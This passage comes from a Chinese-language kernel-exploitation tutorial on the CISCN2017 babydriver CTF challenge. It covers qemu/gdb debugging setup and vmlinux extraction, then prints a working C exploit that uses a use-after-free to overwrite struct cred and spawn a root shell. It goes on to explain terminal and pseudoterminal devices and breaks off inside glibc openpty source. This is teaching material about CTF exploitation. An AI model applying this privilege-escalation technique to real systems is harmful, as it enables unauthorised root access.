class="line"></span><br><span class="line"><span class="comment"># 判断当前权限是否为 root，需要高权限以执行 gef-remote --qemu-mode</span></span><br><span class="line">user=$(<span class="built_in">env</span> | grep <span class="string">&quot;^USER&quot;</span> | <span class="built_in">cut</span> -d <span class="string">&quot;=&quot;</span> -f 2)</span><br><span class="line"><span class="keyword">if</span> [ <span class="string">&quot;<span class="variable">$user</span>&quot;</span> != <span class="string">&quot;root&quot;</span>  ]</span><br><span class="line">  <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;请使用 root 权限执行&quot;</span></span><br><span class="line">    <span class="built_in">exit</span></span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 静态编译 exp</span></span><br><span class="line">gcc exp.c -static -o rootfs/exp</span><br><span class="line"></span><br><span class="line"><span class="comment"># rootfs 打包</span></span><br><span class="line"><span class="built_in">pushd</span> rootfs</span><br><span class="line">find . | cpio -o --format=newc &gt; ../rootfs.cpio</span><br><span class="line"><span class="built_in">popd</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 启动 gdb</span></span><br><span class="line">gnome-terminal -e <span class="string">&#x27;gdb -x mygdbinit&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 启动 qemu</span></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -initrd rootfs.cpio \</span><br><span class="line">    -kernel bzImage \</span><br><span class="line">    -append <span class="string">&#x27;console=ttyS0 root=/dev/ram oops=panic panic=1&#x27;</span> \</span><br><span class="line">    -enable-kvm \</span><br><span class="line">    -monitor /dev/null \</span><br><span class="line">    -m 64M \</span><br><span class="line">    --nographic  \</span><br><span class="line">    -smp cores=1,threads=1 \</span><br><span class="line">    -cpu kvm64,+smep \</span><br><span class="line">    -s</span><br></pre></td></tr></table></figure><blockquote><p>exploit 需要静态编译，因为 kernel 不提供标准库，但一定提供 syscall。</p></blockquote></li><li><p>获取 vmlinux</p><p>我们可以使用 <a href="https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux">extract-vmlinux</a> 工具，从 bzImage 中解压出 vmlinux。</p><blockquote><p>直接让 gdb 加载 bzImage 时将无法加载到任何 kernel 符号，</p><p>因此需要先从 bzImage 中解压出 vmlinux， 再来让 gdb 加载符号。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wget https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux</span><br><span class="line"><span class="built_in">chmod</span> +x ./extract-vmlinux</span><br><span class="line"><span class="built_in">cd</span> CISCN2017-babydriver/babydriver/</span><br><span class="line">../../extract-vmlinux bzImage &gt; vmlinux</span><br></pre></td></tr></table></figure><p>但实际上，解压出来的 vmlinux 的函数名称全部为 <code>sub_xxxx</code>，不方便调试。即便所有的内核符号与函数名称的信息全部位于内核符号表中（或者 <code>/proc/kallsyms</code>），但一个个对应过去也相当麻烦。</p><p>因此还有一个工具可以使用：<code>vmlinux-to-elf</code></p><blockquote><p>使用这个工具之前系统中必须装有<strong>高于3.5</strong>版本的python</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt install python3-pip</span><br><span class="line"><span class="built_in">sudo</span> pip3 install --upgrade lz4 git+https://github.com/marin-m/vmlinux-to-elf</span><br></pre></td></tr></table></figure><p>使用方式：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># vmlinux-to-elf &lt;input_kernel.bin&gt; &lt;output_kernel.elf&gt;</span></span><br><span class="line">vmlinux-to-elf bzImage vmlinux</span><br></pre></td></tr></table></figure><p>之后解压出来的 vmlinux 就是带符号的，可以正常被 gdb 读取和下断点。</p></li><li><p>查看当前 bzImage 所对应的内核版本，并下载该版本的内核代码（如果有需要，想更细致的研究内核的话）</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ strings bzImage | grep <span class="string">&quot;gcc&quot;</span> <span class="comment"># 或者 `file bzImage` 命令</span></span><br><span class="line">4.4.72 (atum@ubuntu) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) <span class="comment">#1 SMP Thu Jun 15 19:52:50 PDT 2017</span></span><br><span class="line"></span><br><span class="line">$ curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-4.4.72.tar.xz</span><br><span class="line">$ unxz linux-4.4.72.tar.xz</span><br><span class="line">$ tar -xf linux-4.4.72.tar</span><br></pre></td></tr></table></figure></li><li><p>启动 kernel 后，别忘记在 gdb 中使用 <code>add-symbol-file</code> 加载 ko 的符号：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># in kernel shell:</span></span><br><span class="line">/ $ lsmod</span><br><span class="line">babydriver 16384 0 - Live 0xffffffffc0000000 (OE)</span><br><span class="line"></span><br><span class="line"><span class="comment"># in gdb:</span></span><br><span class="line">gef➤  add-symbol-file babydriver.ko 0xffffffffc0000000</span><br></pre></td></tr></table></figure></li><li><p>最终设置的 mygdbinit 如下</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">set architecture i386:x86-64</span><br><span class="line">add-symbol-file vmlinux</span><br><span class="line">gef-remote --qemu-mode localhost:1234</span><br><span class="line"></span><br><span class="line">c</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">先 <span class="built_in">continue</span>， 在 insmod 之后手动 Ctrl+C 再设置断点，免得断点处于 pending 状态</span></span><br><span class="line">add-symbol-file babydriver.ko 0xffffffffc0000000</span><br><span class="line"></span><br><span class="line">b babyread</span><br><span class="line">b babywrite</span><br><span class="line">b babyioctl</span><br><span class="line">b babyopen</span><br><span class="line">b babyrelease</span><br><span class="line"></span><br><span class="line">c</span><br></pre></td></tr></table></figure></li></ul><h3 id="5-kernel-的-UAF-利用">5. kernel 的 UAF 利用</h3><h4 id="a-覆写-cred-结构体">a. 覆写 cred 结构体</h4><p>UAF 的常规利用是通过悬垂指针来修改某块特定内存上的数据，因此在这里我们可以试着：</p><ul><li>先让一个悬垂指针指向一块已被释放的内存</li><li>执行 fork 操作，使 fork 时给新子进程分配的 <code>struct cred</code> 结构体重新分配这块内存</li><li>利用悬垂指针来随意修改这块内存上的 <code>struct cred</code> 结构体，达到提权的效果</li></ul><p><code>struct cred</code> 结构体用于 <strong>保存每个进程的权限</strong>，其结构如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * The security context of a task</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The parts of the context break down into two categories:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  (1) The objective context of a task.  These parts are used when some other</span></span><br><span class="line"><span class="comment"> *  task is attempting to affect this one.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  (2) The subjective context.  These details are used when the task is acting</span></span><br><span class="line"><span class="comment"> *  upon another object, be that a file, a task, a key or whatever.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Note that some members of this structure belong to both categories - the</span></span><br><span class="line"><span class="comment"> * LSM security pointer for instance.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * A task has two security pointers.  task-&gt;real_cred points to the objective</span></span><br><span class="line"><span class="comment"> * context that defines that task&#x27;s actual details.  The objective part of this</span></span><br><span class="line"><span class="comment"> * context is used whenever that task is acted upon.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * task-&gt;cred points to the subjective context that defines the details of how</span></span><br><span class="line"><span class="comment"> * that task is going to act upon another object.  This may be overridden</span></span><br><span class="line"><span class="comment"> * temporarily to point to another security context, but normally points to the</span></span><br><span class="line"><span class="comment"> * same context as task-&gt;real_cred.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">cred</span> &#123;</span><br><span class="line">  <span class="type">atomic_t</span>  usage;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_DEBUG_CREDENTIALS</span></span><br><span class="line">  <span class="type">atomic_t</span>  subscribers;  <span class="comment">/* number of processes subscribed */</span></span><br><span class="line">  <span class="type">void</span>    *put_addr;</span><br><span class="line">  <span class="type">unsigned</span>  magic;</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> CRED_MAGIC  0x43736564</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> CRED_MAGIC_DEAD  0x44656144</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="type">kuid_t</span>    uid;    <span class="comment">/* real UID of the task */</span></span><br><span class="line">  <span class="type">kgid_t</span>    gid;    <span class="comment">/* real GID of the task */</span></span><br><span class="line">  <span class="type">kuid_t</span>    suid;    <span class="comment">/* saved UID of the task */</span></span><br><span class="line">  <span class="type">kgid_t</span>    sgid;    <span class="comment">/* saved GID of the task */</span></span><br><span class="line">  <span class="type">kuid_t</span>    euid;    <span class="comment">/* effective UID of the task */</span></span><br><span class="line">  <span class="type">kgid_t</span>    egid;    <span class="comment">/* effective GID of the task */</span></span><br><span class="line">  <span class="type">kuid_t</span>    fsuid;    <span class="comment">/* UID for VFS ops */</span></span><br><span class="line">  <span class="type">kgid_t</span>    fsgid;    <span class="comment">/* GID for VFS ops */</span></span><br><span class="line">  <span class="type">unsigned</span>  securebits;  <span class="comment">/* SUID-less security management */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_inheritable; <span class="comment">/* caps our children can inherit */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_permitted;  <span class="comment">/* caps we&#x27;re permitted */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_effective;  <span class="comment">/* caps we can actually use */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_bset;  <span class="comment">/* capability bounding set */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_ambient;  <span class="comment">/* Ambient capability set */</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_KEYS</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span>  jit_keyring;  <span class="comment">/* default keyring to attach requested</span></span><br><span class="line"><span class="comment">           * keys to */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">key</span> __rcu *session_keyring; <span class="comment">/* keyring inherited over fork */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">key</span>  *process_keyring; <span class="comment">/* keyring private to this process */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">key</span>  *thread_keyring; <span class="comment">/* keyring private to this thread */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">key</span>  *request_key_auth; <span class="comment">/* assumed request_key authority */</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_SECURITY</span></span><br><span class="line">  <span class="type">void</span>    *security;  <span class="comment">/* subjective LSM security */</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">user_struct</span> *user;  <span class="comment">/* real user ID subscription */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">user_namespace</span> *user_ns; <span class="comment">/* user_ns the caps and keyrings are relative to. */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">group_info</span> *group_info;  <span class="comment">/* supplementary groups for euid/fsgid */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">rcu_head</span>  rcu;    <span class="comment">/* RCU deletion hook */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>新进程的 <code>struct cred</code> 结构体分配的代码位于 <code>_do_fork -&gt; copy_process -&gt; copy_creds -&gt; prepare_creds</code> 函数调用链中。</p><p>为了避开繁琐的内存分配利用，精简利用方式，我们只需要让 babydriver 中释放的 <code>device_buf</code> 内存的大小与 <code>sizeof(struct cred)</code>一致即可，这样便可以让内核在为 struct cred 分配内存时，分配到刚释放不久的 device_buf 内存。</p><p>由于当前 bzImage 解压出来的 vmlinux 没有<strong>结构体</strong>符号，因此我们可以直接根据默认参数编译出一个新的 vmlinux，并加载该 vmlinux 来获取 <code>struct cred</code> 结构体的大小：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gef➤  p sizeof(struct cred)</span><br><span class="line"><span class="variable">$1</span> = 0xa8</span><br></pre></td></tr></table></figure><p>执行完 <code>babyrelease</code> 函数之后，<code>device_buf</code>就会成为悬垂指针。但需要注意的是，在用户进程空间中，当执行<code>close(fd)</code>之后，该进程将无法再使用这个文件描述符，因此没有办法在<code>close</code>后再利用这个 fd 去进行写操作。</p><p>但我们可以利用 babydriver 中的<strong>变量全是全局变量</strong>的这个特性，同时执行两次 open 操作，获取两个 fd。这样即便一个 fd 被 close 了，我们仍然可以利用另一个 fd 来对 <code>device_buf</code> 进行写操作。</p><p>这样一套完整的利用流程就出来了，exploit 如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/wait.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> fd1 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR); <span class="comment">// alloc</span></span><br><span class="line">    <span class="type">int</span> fd2 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR); <span class="comment">// alloc</span></span><br><span class="line">    <span class="built_in">ioctl</span>(fd1, <span class="number">65537</span>, <span class="number">0xa8</span>);    <span class="comment">// realloc</span></span><br><span class="line">    <span class="built_in">close</span>(fd1); <span class="comment">// free</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!fork()) &#123;</span><br><span class="line">        <span class="comment">// child</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">// try to overwrite struct cred</span></span><br><span class="line">        <span class="type">char</span> mem[<span class="number">4</span> * <span class="number">7</span>]; <span class="comment">// usage uid gid suid sgid euid egid</span></span><br><span class="line">        <span class="built_in">memset</span>(mem, <span class="string">&#x27;\x00&#x27;</span>, <span class="built_in">sizeof</span>(mem));</span><br><span class="line">        <span class="built_in">write</span>(fd2, mem, <span class="built_in">sizeof</span>(mem));</span><br><span class="line"></span><br><span class="line">        <span class="comment">// get shell</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[+] after LPE, privilege: %s\n&quot;</span>, (<span class="built_in">getuid</span>() ? <span class="string">&quot;user&quot;</span> : <span class="string">&quot;root&quot;</span>));</span><br><span class="line">        <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="comment">// parent</span></span><br><span class="line">        <span class="built_in">waitpid</span>(<span class="number">-1</span>, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>需要注意的是，当进程执行完 fork 操作后，父进程必须 wait 子进程，否则当父进程被销毁后，该进程成为孤儿进程，将无法使用终端进行输入输出。</p></blockquote><p>利用结果：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211007082752272.png" alt="image-20211007082752272"></p><h4 id="b-Kernel-ROP">b. Kernel ROP</h4><h5 id="1-终端设备类型简介">1) 终端设备类型简介</h5><p>在 Linux 中 <code>/dev</code> 目录下，终端设备文件通常有以下几种：</p><blockquote><p>注意：以下这些类型的终端不一定在所有发行版 linux 上都存在，例如 <code>/dev/ttyprintk</code> 就不存在于我的 kali linux 上。</p></blockquote><ol><li><p>串行端口终端 （<strong>/dev/ttySn</strong>） ：是用于与串行端口连接的终端设备，类似于 Windows 下的 COM。</p></li><li><p>控制终端 （<strong>/dev/tty</strong>） ：<strong>当前进程</strong>的控制终端设备文件，类似于符号链接，会具体对应至某个实际终端文件。</p><blockquote><p>可以使用 <code>tty</code> 命令查看其具体对应的终端设备，也可以使用 <code>ps -ax</code> 来查看进程与控制终端的映射关系。</p></blockquote><p><img src="/2021/10/kernel_pwn_introduction/image-20211007225628587.png" alt="image-20211007225628587"></p><blockquote><p>在 qemu 下，可以通过指定<code>-append 'console=ttyS0'</code> 参数，设置 linux kernel tty 映射至 <code>/dev/ttySn</code> 上。</p></blockquote><p><img src="/2021/10/kernel_pwn_introduction/image-20211007230821016.png" alt="image-20211007230821016"></p></li><li><p>虚拟终端与控制台 （<strong>/dev/ttyN, /dev/console</strong>） ：在Linux 系统中，计算机显示器通常被称为<strong>控制台终端</strong> (Console)。而在 linux <strong>初始字符界面</strong>下，为了同时处理多任务，自然需要多个终端的切换。这些终端由于是用软件来模拟以前硬件的方式，是虚拟出来的，因此也称为<strong>虚拟终端</strong>。</p><blockquote><p>虚拟终端和控制台的差别需要参考历史。在以前，终端是通过串口连接上的，不是计算机本身就有的设备，而控制台是计算机本身就有的设备，一个计算机只有一个控制台。</p><p>简单的说，<strong>控制台是直接和计算机相连接的原生设备，终端是通过电缆、网络等等和主机连接的设备</strong></p><p>计算机启动的时候，所有的信息都会显示到控制台上，而不会显示到终端上。也就是说，控制台是计算机的基本设备，而终端是附加设备。</p><p>由于控制台也有终端一样的功能，控制台有时候也被模糊的统称为终端。</p><p>计算机操作系统中，与终端不相关的信息，比如内核消息，后台服务消息，都可以显示到控制台上，但不会显示到终端上。</p><p>由于时代的发展，硬件资源的丰富，终端和控制台的概念已经慢慢淡化。</p></blockquote><p>这种虚拟终端的切换与我们X11中图形界面中多个终端的切换不同，它属于<strong>更高级别终端的切换</strong>。我们日常所使用的图形界面下的终端，属于某个<strong>虚拟图形终端界面</strong>下的多个<strong>伪终端</strong>。</p><p>可以通过键入 <code>Ctrl+Alt+F1</code> （其中的 F<strong>x</strong> 表示切换至第 <strong>x</strong> 个终端，例如 F1）来切换虚拟终端。</p><blockquote><p>tty0则是当前所使用虚拟终端的一个别名，系统所产生的信息会发送到该终端上。</p></blockquote><p>默认情况下，F1-F6均为字符终端界面，F7-F12为图形终端界面。</p><blockquote><p>当切换至字符终端界面后，可再次键入 <code>Ctrl+Alt+F7</code>切回图形终端界面。</p></blockquote><p><img src="/2021/10/kernel_pwn_introduction/image-20211007231737902.png" alt="image-20211007231737902"></p></li><li><p>伪终端 （<strong>/dev/pty</strong>）：<strong>伪终端(Pseudo Terminal)<strong>是成对的</strong>逻辑</strong>终端设备，其行为与普通终端非常相似。所不同的是伪终端没有对应的硬件设备，主要目的是实现双向信道，为其他程序提供终端形式的接口。</p><p>当我们远程连接到主机时，与主机进行交互的终端的类型就是伪终端，而且日常使用的图形界面中的多个终端也全都是伪终端。</p><p>伪终端的两个终端设备分别称为 master 设备和 slave 设备，其中 slave 设备的行为与普通终端无异。</p><p>当某个程序把某个 master 设备看作终端设备并进行读写，则该读写操作将实际反应至该逻辑终端设备所对应的另一个 slave 设备。通常 slave 设备也会被其他程序用于读写。因此这两个程序便可以通过这对逻辑终端来进行通信。</p><p>现代 linux 主要使用 <strong>UNIX 98 pseudoterminals</strong> 标准，即 <strong>pts(pseudo-terminal slave, /dev/pts/n)</strong> 和 <strong>ptmx(pseudo-terminal master, /dev/ptmx)</strong> 搭配来实现 pty。</p><p>伪终端的使用一会将在下面详细说明。</p></li><li><p>其他终端 （诸如 <strong>/dev/ttyprintk</strong> 等等）。这类终端通常是用于特殊的目的，例如 <strong>/dev/ttyprintk</strong> 直接与内核缓冲区相连：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211007233344098.png" alt="image-20211007233344098"></p></li></ol><h5 id="2-伪终端的使用">2) 伪终端的使用</h5><p>伪终端的具体实现分为两种</p><ul><li>UNIX 98 pseudoterminals，涉及 <code>/dev/ptmx</code> （master）和 <code>/dev/pts/*</code>（slave）</li><li>老式 BSD pseudoterminals，涉及 <code>/dev/pty[p-za-e][0-9a-f]</code>(master) 和 <code>/dev/tty[p-za-e][0-9a-f]</code>(slave)</li></ul><p>这里我们只介绍 UNIX 98 pseudoterminals。</p><p><code>/dev/ptmx</code>这个设备文件主要用于打开一对伪终端设备。当某个进程 open 了 <code>/dev/ptmx</code>后，该进程将获取到一个指向 <strong>新伪终端master设备（PTM）</strong> 的文件描述符，同时对应的 <strong>新伪终端slave设备（PTS）</strong> 将在 <code>/dev/pts/</code>下被创建。不同进程打开 <code>/dev/ptmx</code> 后所获得到的 PTM、PTS 都是互不相同的。</p><p>进程打开 /dev/ptmx 有两种方式</p><ol><li><p>手动使用 <code>open(&quot;/dev/ptmx&quot;, O_RDWR | O_NOCTTY)</code> 打开</p></li><li><p>通过标准库函数 <code>getpt</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _GNU_SOURCE             <span class="comment">/* See feature_test_macros(7) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">getpt</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>通过标准库函数 <code>posix_openpt</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">posix_openpt</span><span class="params">(<span class="type">int</span> flags)</span></span>;</span><br></pre></td></tr></table></figure></li></ol><blockquote><p>上述几种方式完全等价，只是<strong>使用标准库函数</strong>的方式会更通用一点，因为 ptmx 在某些 linux 发行版上可能不位于 <code>/dev/ptmx</code>，同时标准库函数还会做其他额外的检测逻辑。</p></blockquote><p>进程可以调用<code>ptsname(ptm_fd)</code>来获取到对应的 PTS 的路径。</p><p>需要注意的是，必须先顺序调用以下两个函数后才能打开 PTS:</p><ol><li><code>grantpt(ptm_fd)</code>：更改 slave 的模式和所有者，获取其所有权</li><li><code>unlockpt(ptm_fd)</code>：对 slave 解锁</li></ol><p>伪终端主要用于两个应用场景</p><ul><li>终端仿真器，为其他远程登录程序（例如 ssh）提供终端功能</li><li>可用于向<strong>通常拒绝从管道读取输入</strong>的程序（例如 su 和 passwd）发送输入</li></ul><p>上述几步是使用伪终端所必须调用的一些底层函数。但在实际的伪终端编程中，更加常用的是以下几个函数：</p><blockquote><p>我们可以通过阅读这些函数的源代码来了解伪终端的使用方式。</p></blockquote><ul><li><p><code>openpty</code>：找到一个空闲的伪终端，并将打开好后的 master 和 slave 终端的文件描述符返回。源代码如下:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Create pseudo tty master slave pair and set terminal attributes</span></span><br><span class="line"><span class="comment">   according to TERMP and WINP.  Return handles for both ends in</span></span><br><span class="line"><span class="comment">   AMASTER and ASLAVE, and return the name of the slave end in NAME.  */</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">openpty</span> <span class="params">(<span class="type">int</span> *amaster, <span class="type">int</span> *aslave, <span class="type">char</span> *name,</span></span></span><br><span class="line"><span class="params"><span class="function">  <span class="type">const</span> <span class="keyword">struct</span> termios *termp, <span class="type">const</span> <span class="keyword">struct</span> winsize *winp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> PATH_MAX</span></span><br><span class="line">  <span class="type">char</span> _buf[PATH_MAX];</span><br><span class="line"><span class="meta">#<span 